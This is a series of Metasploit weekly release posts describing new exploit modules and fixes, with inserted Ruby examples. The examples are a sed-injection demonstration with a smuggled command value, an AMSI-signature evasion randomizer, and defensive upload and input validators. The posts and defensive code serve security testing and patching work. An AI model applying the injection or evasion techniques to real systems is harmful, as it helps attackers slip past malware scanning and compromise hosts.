If you attended DEF CON last week, you may have seen this talk on print driver vulnerabilities from Metasploit community contributor Jacob Baines. In the spirit of Friday the 13th, we’re highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added.

The first is a Canon TR150 Print Driver Local Privilege Escalation module, which exploits CVE-2021-38085. The second is a Lexmark Universal Print Driver Local Privilege Escalation module, which exploits CVE-2021-35449. Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a SYSTEM user.

Atlassian Crowd RCE

Also new in this week’s release is an Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module by Rapid7’s own Grant Willcox, which exploits CVE-2019-11580. This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd and Crowd Data Center servers and achieve unauthenticated remote code execution. The module also includes a check method for verifying whether a target is vulnerable. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of the 12 most routinely exploited vulnerabilities of 2020.

New module content (3)

  • Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE by Corben Leo, Grant Willcox, and Paul, which exploits CVE-2019-11580 – This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.
  • Canon Driver Privilege Escalation by Jacob Baines and Shelby Pace, which exploits CVE-2021-38085 – A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the SYSTEM user.
  • Lexmark Driver Privilege Escalation by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits CVE-2021-35449 – A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain SYSTEM level code execution.

Enhancements and features

  • #15327 from adfoster-r7 – Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn’t break in the future.
  • #15430 from zeroSteiner – This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both auxiliary/scanner/ssh/ssh_login and auxiliary/scanner/ssh/ssh_login_pubkey modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).
  • #15493 from jmartin-r7 – Updated Metasploit’s dependency on Rails from version 5.2 to 6.1
  • #15523 from adfoster-r7 – This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.
  • #15535 from adfoster-r7 – The psexec module has been updated to use the SMBSHARE option name instead of SHARE for better consistency across modules. Users can still use the old SHARE option if needed, however this should be considered deprecated.

Bugs fixed

  • #15524 from pingport80 – This fixes a localization-related issue in the post/linux/gather/enum_network module, caused by it searching for language-specific strings in the output to determine success.
  • #15534 from timwr – Fixes a regression issue in post/multi/manage/shell_to_meterpreter where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.
  • #15536 from zeroSteiner – The HiveNightmare module has been updated to correctly use the ITERATIONS option instead of the NBRE_ITER option when performing the loop to call check_path(). This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.
  • #15542 from adfoster-r7 – This fixes a regression with Meterpreter’s initialize methods, which caused Meterpreter scripts to be broken.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Matthew Kienow original https://blog.rapid7.com/2021/08/06/metasploit-wrap-up-124/

Desert heat (not the 1999 film)

This week was quieter than normal with Black Hat USA and DEF CON, but that didn’t stop the team from delivering some small enhancements and bug fixes! We are also excited to see two new modules, #15519 and #15520, from researcher Jacob Baines’ DEF CON talk Bring Your Own Print Driver Vulnerability already appear in the PR queue. Keep an eye out for those modules in the near future!

Our very own Simon Janusz enhanced the CommandDispatcher and SessionManager to support using a negative ID with both the jobs and sessions commands. Quickly access the last job or session by passing -1 to the command. The change allows users to upgrade the most recently opened session to meterpreter using the command sessions -u -1, thus removing the need to run the post/multi/manage/shell_to_meterpreter module.

In addition, our very own Alan David Foster updated the PostgreSQL scanner/postgres/postgres_schemadump module so that it does not ignore the default postgres database. That default database might contain valuable information after all! The enhancements also introduce a new datastore option, IGNORED_DATABASES, to configure a list of databases ignored during the schema dump.

Enhancements and features

  • #15492 from sjanusz-r7 – Adds support for negative session and job ids.
  • #15498 from adfoster-r7 – Updates the PostgreSQL schema_dump module to no longer ignore the default postgres database which may contain useful information, and adds a new datastore option to configure ignored databases.

Bugs fixed

  • #15500 from agalway-r7 – Fixes a regression issue for gitlab_file_read_rce and cacti_filter_sqli_rce where the modules failed to run
  • #15503 from jheysel-r7 – A bug has been fixed in the Cisco Hyperflex file upload RCE module that prevented it from properly deleting the uploaded payload files. Uploaded payload files should now be properly deleted.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2021/07/30/metasploit-wrap-up-123/

New Olympic Discipline: Hive Hunting

This week, community contributor Hakyac added a new Olympic discipline to the Metasploit exploit sport category, based on the work of community security researchers @jonasLyk and Kevin Beaumont. The rules are simple: you need to abuse a flaw in the Windows 10 and 11 configuration to get past the defense and access the Security Account Manager (SAM) files. Any local unprivileged player is able to read this sensitive security information, such as the hashes of user and admin passwords. The best strategy for a gold medal is to abuse the Windows Volume Shadow Copy Service (VSS) to access these files and copy them locally. Finally, you just need to dump the NTLM hashes, use them in a pass-the-hash attack and score with remote code execution.

Note that Microsoft issued an out-of-band advisory and tracked this vulnerability as CVE-2021-36934. You can find more information about the rules in this blog post. Happy Hive hunting!

Gold Medal for NetGear R7000 in Swimming 100m Heap Overflow

Our own Grant Willcox added a new exploit module that won the Swimming 100m Heap Overflow discipline. It takes advantage of a flaw in the genie.cgi?backup.cgi page of Netgear R7000 routers to enable a telnet server and get code execution as the root user. Note that, whereas firmware versions 1.0.11.116 and prior are vulnerable, this module can only be used against version 1.0.11.116 at the moment. The check method can still be used to detect whether older devices are vulnerable. This module is based on research done by @colorlight2019. A new gold medal for the Metasploit team, great job!

New module content (5)

  • Netgear R7000 backup.cgi Heap Overflow RCE by Grant Willcox, SSD Disclosure, and colorlight2019, which exploits CVE-2021-31802 – This adds a module that leverages CVE-2021-31802, an unauthenticated RCE in Netgear R7000 routers. The vulnerability is used to execute a shellcode stub that enables telnet, which can then be accessed for root privileges on the affected device.
  • Pi-Hole Remove Commands Linux Priv Esc by Emanuele Barbeno and h00die, which exploits CVE-2021-29449 – This adds a local privilege escalation module that targets Pi-Hole versions >= 3.0 and <= 5.2.4. In vulnerable versions of the software, a user with sudo privileges can escalate to root by passing shell commands to either the removecustomcname, removecustomdns, or removestaticdhcp function. The functions have minimal sanitization, and they pass the input to the sed command. By default, the www-data user is permitted to run sudo without supplying a password as configured in the sudoers.d/pihole file.
  • WordPress Plugin Modern Events Calendar – Authenticated Remote Code Execution by Nguyen Van Khanh, Ron Jost, and Yann Castel, which exploits CVE-2021-24145 – This adds a module that exploits an authenticated file upload vulnerability in the WordPress plugin known as Modern Events Calendar. For versions before 5.16.5, an administrative user can upload a php payload via the calendar import feature by setting the content type of the file to text/csv. Code execution with the privileges of the user running the server is achieved by sending a request for the uploaded file.
  • WordPress Plugin SP Project and Document – Authenticated Remote Code Execution by Ron Jost and Yann Castel, which exploits CVE-2021-24347 – This adds a module that exploits an authenticated file upload vulnerability in the WordPress plugin, SP Project and Document Manager. For versions below 4.22, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a .php extension, meaning that uploading a file with a .pHp extension is allowed. Once uploaded, requesting the file will result in code execution as the www-data user.
  • Windows SAM secrets leak – HiveNightmare by Kevin Beaumont, Yann Castel, and romarroca, which exploits CVE-2021-36934 – This adds a new exploit module that exploits a configuration issue in Windows 10 (from version 1809) and 11, identified as CVE-2021-36934. Due to permission issues, any local user is able to read SAM and SYSTEM hives. This module abuses Windows Volume Shadow Copy Service (VSS) to access these files and save them locally.
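
The Pi-Hole entry in the list above describes user input reaching a sed command with minimal sanitization while sudo lets www-data run the tool without a password. Below is an added Ruby illustration of that bug class beside a hardened version. It is constructed for this page and is not Pi-hole's shell code or the Metasploit module: the file path, function names and the exact sed invocation are assumptions modelled on the description. The point it makes is that moving from a shell string to an argv array closes shell injection but not sed-script injection, so the value must be validated before it is used in the pattern.

```ruby
require 'ipaddr'

# Added example, not Pi-hole's code. Vulnerable shape: the caller's ip and
# host are interpolated straight into a sed script that runs through a shell.
# Returns the command instead of running it so the injection is visible.
def vulnerable_remove_cmd(ip, host, file)
  "sudo sed -i '/#{ip} #{host}/d' #{file}"
end

# RFC 1123 style hostname: labels of 1..63 letters, digits or hyphens, no
# leading or trailing hyphen, 253 characters overall.
HOSTNAME = /\A(?=.{1,253}\z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\z/

# Hardened shape: validate both values before they reach sed, then hand sed
# an argv array (no shell). Validation is the part that matters: sed
# interprets its own script, so a host such as "x/d;e id" would still smuggle
# in a sed 'e' (execute) command even with no shell in the way.
def hardened_remove_argv(ip, host, file)
  begin
    IPAddr.new(ip)
  rescue IPAddr::InvalidAddressError
    raise ArgumentError, "invalid IP address: #{ip.inspect}"
  end
  raise ArgumentError, "invalid hostname: #{host.inspect}" unless host.match?(HOSTNAME)
  # A dot is the only regex metacharacter a valid hostname or IPv4 address can
  # contain, so escaping it yields a literal-match pattern.
  pattern = "#{ip} #{host}".gsub('.') { '\.' }
  ['sed', '-i', "/^#{pattern}$/d", file] # run with system(*argv), never system(argv.join(' '))
end

if __FILE__ == $PROGRAM_NAME
  puts vulnerable_remove_cmd('192.168.1.10', 'pi.hole/d;e id', '/etc/pihole/custom.list')
  p hardened_remove_argv('192.168.1.10', 'pi.hole', '/etc/pihole/custom.list')
end
```

Anchoring the pattern with ^ and $ also stops a legitimate-looking entry from deleting every line that merely contains the same substring, which is a correctness bug rather than a security one but comes for free once the values are known to be well-formed.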

Enhancements and features

  • #15444 from pingport80 – This adds additional support for Powershell sessions to some methods in the File mixin leveraged by post modules.
  • #15465 from sjanusz-r7 – Updates the local exploit suggester to gracefully handle modules raising unintended exceptions and nil target information

Bugs fixed

  • #15359 from stephenbradshaw – Fixes a bug in the ssh_login_pubkey module which caused it to crash when not connected to the database
  • #15460 from pingport80 – This fixes a localization-related issue in the File libraries copy_file method caused by it searching for a word in the output to determine success.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/

Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product from Sage Group designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well, wait no more: thanks to the work of Aaron Herndon, Jonathan Peterson, William Vu, Cale Black, and Ryan Villarreal, along with work from community contributor deadjakk, Metasploit now has an exploit module for CVE-2020-7388 and CVE-2020-7387 that allows unauthenticated attackers to gain SYSTEM-level code execution on affected versions of Sage X3. This module should prove very useful on engagements, both as a way to gain an initial foothold in a target network and as a way to elevate privileges for more effective pivoting throughout the network. More information on these vulnerabilities can be found in our detailed writeup post on our blog.

Help My Server is Raining Keys

Another great module that landed this week was an exploit for CVE-2021-27850 from Johannes Mortiz and Yann Castel aka Hakyac, which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications, as it is often used to sign important data within the application. In the case of Apache Tapestry, one can take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadget chains such as CommonsBeanutils1 from ysoserial. This is one to keep an eye out for and patch if you haven’t already.

PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to Spencer McIntyre to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the \??\UNC\ bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit’s DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

New module content (4)

Enhancements and features

  • #15403 from pingport80 – This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
  • #15409 from zeroSteiner – An update has been made to the PrintNightmare module to improve the way it checks whether a target is vulnerable and to automatically convert UNC paths to the \??\UNC\host\path\to\dll format, bypassing the second and most recent patch at the time of writing. Additionally, a bug was fixed in the DCERPC library where data that was read would be incomplete when the response did not fit into a single fragment; the PrintNightmare module can now read long responses from the target, such as when enumerating the installed printer drivers.
  • #15440 from bwatters-r7 – This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Bugs fixed

  • #14683 from gwillcox-r7 – This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
  • #15436 from sjanusz-r7 – Ensure that generated variable names aren’t Java keywords
  • #15443 from dwelch-r7 – Adds python3 support for the wmiexec external module auxiliary/scanner/smb/impacket/wmiexec
  • #15445 from zeroSteiner – Updates msfconsole’s output logs to only show the target’s ip when an exploit module is run, rather than a host-hash

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/

Eternal Blue improvements

Prior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate ms17_010_eternalblue_win8 Python module would target Windows 8 and above.

Now Metasploit provides a single Ruby exploit module exploits/windows/smb/ms17_010_eternalblue.rb which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.

AmSi 0BfuSc@t!on

The Anti-Malware Scan Interface (AMSI) integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist, and one such technique is integrated directly into Metasploit, the bypass stub itself is identified as malicious. That is a chicken-and-egg problem: the stub cannot be executed to bypass AMSI and permit the payload to execute. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known AMSI signatures, such as amsiInitFailed, and shuffles the placement of PowerShell expressions. With these improvements in place, PowerShell payloads are now much more likely to execute successfully. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting Powershell::prepend_protections_bypass to false.
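
The two transformations the paragraph above describes, splitting signatured string literals and reordering independent statements, as an added Ruby example (Metasploit's implementation language). This is not the framework's own Rex::Powershell code: the stub it rewrites is a constructed placeholder that only concatenates and prints strings, not an AMSI bypass, and the grouping of statements into independently shufflable groups is an assumption made here so that a statement never moves ahead of something it depends on.

```ruby
# Added example, not Metasploit's code. Applies two randomizations to a
# constructed PowerShell stub: every single-quoted literal becomes a
# concatenation of random chunks (so a signature such as 'amsiInitFailed'
# never appears contiguously in the script) and statements whose order does
# not matter are shuffled. Variables assigned in the stub also get fresh names.

# Split a literal into two or more random chunks and emit a PowerShell
# concatenation, e.g. ('amsi'+'Init'+'Failed'). Evaluates to the original.
def obfuscate_literal(str, rng)
  return "'#{str}'" if str.length < 2
  max_cuts = [3, str.length - 1].min
  cuts = (1...str.length).to_a.sample(rng.rand(1..max_cuts), random: rng).sort
  chunks = []
  prev = 0
  (cuts + [str.length]).each do |cut|
    chunks << str[prev...cut]
    prev = cut
  end
  '(' + chunks.map { |c| "'#{c}'" }.join('+') + ')'
end

# Rewrite every single-quoted literal on a line. PowerShell single quotes do
# not interpolate, so the pieces need no further escaping.
def obfuscate_line(line, rng)
  line.gsub(/'([^']+)'/) { obfuscate_literal(Regexp.last_match(1), rng) }
end

# Give every variable assigned in the stub a fresh lowercase name. PowerShell
# variable names are case-insensitive, so only lowercase letters are used to
# avoid accidental collisions. Variables that are only read are left alone.
def rename_variables(lines, rng)
  assigned = lines.flat_map { |l| l.scan(/\$(\w+)\s*=/).flatten }.uniq
  mapping = {}
  assigned.each do |name|
    fresh = ('a'..'z').to_a.sample(rng.rand(6..12), random: rng).join
    fresh = ('a'..'z').to_a.sample(rng.rand(6..12), random: rng).join while mapping.value?(fresh)
    mapping[name] = fresh
  end
  lines.map do |l|
    l.gsub(/\$(\w+)/) { "$#{mapping.fetch(Regexp.last_match(1), Regexp.last_match(1))}" }
  end
end

# groups: an array of statement groups. Statements within a group are
# independent and may be reordered; groups keep their relative order. The
# generator is seeded so a given seed reproduces the same stub.
def randomize_stub(groups, seed)
  rng = Random.new(seed)
  lines = groups.flat_map { |group| group.shuffle(random: rng) }
  rename_variables(lines, rng).map { |line| obfuscate_line(line, rng) }
end

# Constructed placeholder stub: two independent assignments, then one use.
PLACEHOLDER_STUB = [
  ["$sig = 'amsiInitFailed'", "$ns = 'System.Management.Automation'"],
  ["Write-Output ($ns + ' ' + $sig)"]
].freeze

if __FILE__ == $PROGRAM_NAME
  puts randomize_stub(PLACEHOLDER_STUB, 42)
end
```

Each run with a different seed yields a script with the same behaviour but different literals, variable names and statement order, which is what defeats a static signature on the stub while leaving its semantics intact.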

VMware vCenter Server RCE

Our very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the module documentation.

New module content (4)

  • VMware vCenter Server Virtual SAN Health Check Plugin RCE by wvu and Ricter Z, which exploits CVE-2021-21985 – A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user.
  • Polkit D-Bus Authentication Bypass by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits CVE-2021-3560 – A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations that is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with root permissions, which can then be used to gain a shell as root. Note that on some systems exploitation requires a non-interactive session, so users may need to gain an SSH session first before exploiting this vulnerability.
  • ForgeRock / OpenAM Jato Java Deserialization by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits CVE-2021-35464 – A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability in OpenAM and ForgeRock AM. Successful exploitation allows for remote code execution as the user running the OpenAM service.
  • Windows Process Memory Dump by smashery – This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and deletes the temporary file on the target.

Enhancements and features

  • #15217 from agalway-r7 – Removes the Python module ms17_010_eternalblue_win8.py and consolidates the functionality into exploits/windows/smb/ms17_010_eternalblue.rb – which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.
  • #15254 from zeroSteiner – This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.

Bugs fixed

  • #15362 from bwatters-r7 – Fixes a regression issue with post/multi/manage/shell_to_meterpreter, and other interactions with command shell based sessions
  • #15420 from adfoster-r7 – Fixes a regression issue where auxiliary/scanner/ssh/eaton_xpert_backdoor failed to load correctly

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/

PrintNightmare

Rapid7 security researchers Christophe De La Fuente and Spencer McIntyre have added a new module for CVE-2021-34527, dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\SYSTEM.

Because Metasploit’s SMB server doesn’t support SMB3 (yet), it’s highly recommended to use an external SMB server like Samba that supports SMB3. The Metasploit module documentation details the process of generating a payload DLL and using this module to load it.

CVE-2021-34527 is being actively exploited in the wild. For more information and a full timeline, see Rapid7’s blog on PrintNightmare!

NSClient++

Great work by community contributor Yann Castel on their new NSClient++ module. This module allows an attacker with an unprivileged Windows account to gain administrative access on a Windows system and start a shell.

For this module to work, both the web interface of NSClient++ and the ExternalScripts feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.

New module content (2)

  • Print Spooler Remote DLL Injection by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits CVE-2021-34527 – A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.

  • NSClient++ 0.5.2.35 – Privilege escalation by BZYO, Yann Castel and kindredsec – This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path and, so long as NSClient++ has both the web interface and the ExternalScripts feature enabled, gains a SYSTEM shell.

Enhancements and features

  • #15366 from pingport80 – This updates how the msfconsole’s history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).

Bugs fixed

  • #15320 from agalway-r7 – A bug has been fixed in the read_file method of lib/msf/core/post/file.rb that prevented PowerShell sessions from being able to use the read_file() method. PowerShell sessions should now be able to use this method to read files from the target system.
  • #15371 from bcoles – This fixes an issue in the apport_abrt_chroot_priv_esc module where if the apport-cli binary was not in the PATH the check method would fail.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2021/07/02/metasploit-wrap-up-119/

Containers that fail to Contain

Our own Christophe De La Fuente added a module for CVE-2019-5736, based on the work of Adam Iwaniuk, that breaks out of a Docker container by overwriting the host’s runc binary from inside the container; the overwritten binary then runs in the context of the user outside the container who next runs docker exec against it.

Execute an Image Please, WordPress

Community contributor Alexandre Zanni sent us a PR that uses native PHP functions to upload a file as an image attachment to WordPress installations running the wpDiscuz plugin, then executes it by requesting the path of the uploaded file.

New module content (2)

Enhancements and features

  • #15363 from HynekPetrak – Enhances the auxiliary/scanner/ipmi/ipmi_dumphashes module to have SESSION_RETRY_DELAY and SESSION_MAX_ATTEMPTS options

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2021/06/25/metasploit-wrap-up-118/

Cisco ‘Sploits

This week’s Metasploit Framework release brings two modules that target Cisco products. The first module, written by our very own jheysel-r7, targets an unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform. Vulnerable versions of the Cisco HyperFlex software permit uploading of files through the /upload endpoint due to a missing authentication requirement. The exploit module uploads a jsp web shell and obtains code execution as the Tomcat user.

Community contributor Hakyac wrote the second module that targets Cisco Data Center Network Manager (DCNM). The module, auxiliary/admin/networking/cisco_dcnm_auth_bypass, leverages a static encryption key in the REST API of DCNM to generate a valid session token that is then used to create an administrative account with high privileges and access to sensitive data.

rConfig Authenticated File Upload RCE

Community contributor Hakyac wrote another exploit module that targets network management software. exploit/linux/http/rconfig_vendors_auth_file_upload_rce uses an authenticated file upload vulnerability to achieve remote code execution against vulnerable rConfig installations, specifically versions 3.9.6 and below. The vendor logo functionality in lib/crud/vendors.crud.php allows an authenticated user to upload images; however, there are no checks on the contents of the uploaded file. Because of this, an authenticated attacker can upload a php shell and trigger its execution via a request to the file’s name in the /images/vendor path.
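
Both the wpDiscuz attachment upload described earlier and rConfig’s vendor logo upload share the same missing step: nothing checks that the "image" is actually an image. The Ruby below is an added example (not code from rConfig, wpDiscuz or the Metasploit modules) of what a hardened handler does instead: it allow-lists the extension, reads the file’s leading bytes against known image signatures, and refuses any upload whose bytes and extension disagree. The names `safe_upload?`, `detect_image_type` and the signature table are this example’s own.

```ruby
# Magic-byte signatures for the image types the handler is willing to accept.
# Constructed allow-list for this example; extend it deliberately, not by default.
IMAGE_SIGNATURES = {
  'png'  => ["\x89PNG\r\n\x1a\n".b],
  'jpg'  => ["\xFF\xD8\xFF".b],
  'jpeg' => ["\xFF\xD8\xFF".b],
  'gif'  => ['GIF87a'.b, 'GIF89a'.b]
}.freeze

# Returns the extension whose signature matches the leading bytes, or nil.
def detect_image_type(bytes)
  head = bytes.b
  IMAGE_SIGNATURES.each do |ext, sigs|
    return ext if sigs.any? { |sig| head.start_with?(sig) }
  end
  nil
end

# The check the vulnerable handlers skipped: is this upload really an image
# of the type its filename claims?
def safe_upload?(filename, bytes)
  base = File.basename(filename)
  return false if base.count('.') != 1          # rejects "shell.php.png" and extension-less names
  ext = File.extname(base).delete_prefix('.').downcase
  return false unless IMAGE_SIGNATURES.key?(ext)
  detected = detect_image_type(bytes)
  return false if detected.nil?                 # not an image at all (e.g. a bare "<?php ..." file)
  canon = ->(e) { e == 'jpeg' ? 'jpg' : e }     # jpg and jpeg are the same format
  canon.call(detected) == canon.call(ext)       # the signature must agree with the extension
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: a minimal PNG header and a bare PHP file renamed as an image.
  png = "\x89PNG\r\n\x1a\n".b + ("\x00" * 16).b
  php = "<?php echo 1; ?>".b
  puts "logo.png  / png bytes : #{safe_upload?('logo.png', png)}"   # true
  puts "logo.png  / php bytes : #{safe_upload?('logo.png', php)}"   # false
  puts "a.php.png / png bytes : #{safe_upload?('a.php.png', png)}"  # false
end
```

A signature check stops a renamed PHP file, but not a valid image with PHP appended in its metadata, so the upload directory should additionally be served without script execution and files stored under a server-chosen name. That second measure is what defeats the final step both modules rely on: requesting the uploaded file by its original name under a web-served path.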

New module content (3)

  • Cisco DCNM auth bypass by mr_me and Yann Castel, which exploits CVE-2019-15975 – This adds a module that leverages CVE-2019-15975 which is an authentication bypass in Cisco’s DCNM platform. The module will leverage the vulnerability to add a new administrative user account with known credentials that can be used to access the system.
  • Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499) by wvu, Mikhail Klyuchnikov, Nikita Abramov, and jheysel-r7, which exploits CVE-2021-1499 – This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.
  • rConfig Vendors Auth File Upload RCE by Murat Şeker, Vishwaraj Bhattrai, and Yann Castel – This adds an exploit module for rConfig versions <= 3.9.6. An arbitrary file upload vulnerability exists in lib/crud/vendors.crud.php through the vendorLogo parameter. The functionality for uploading vendor logos does not validate the contents of uploaded files, so an authenticated user has the capability of uploading arbitrary php code. Once uploaded, code execution on the server can be achieved by requesting the uploaded php file in the images/vendor path.

Enhancements and features

  • #15358 from zeroSteiner – This updates the exploit/multi/ssh/sshexec module to now account for cases where the target system does not have the python binary. Using the new binary_exists() class method in lib/msf/base/sessions/command_shell.rb, the module now checks for and uses the valid Python binary found on the target system despite not having a fully-established session.

Bugs fixed

  • #15350 from pingport80 – Fixes a regression issue in the windows/manage/shellcode_inject module which crashed due to a missing mixin
  • #15352 from adfoster-r7 – Fixes an issue where running msfdb init on an already initialised database would generate a new password instead of just starting the database

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/06/18/metasploit-wrap-up-117/

I’m very Emby-ous

Community contributor btnz-k has authored a new Emby Version Scanner module consisting of both an exploit and a scanner for the SSRF vulnerability found in Emby. Emby is a previously open source media server designed to organize, play, and stream audio and video to a variety of devices.

SharePoint of entry

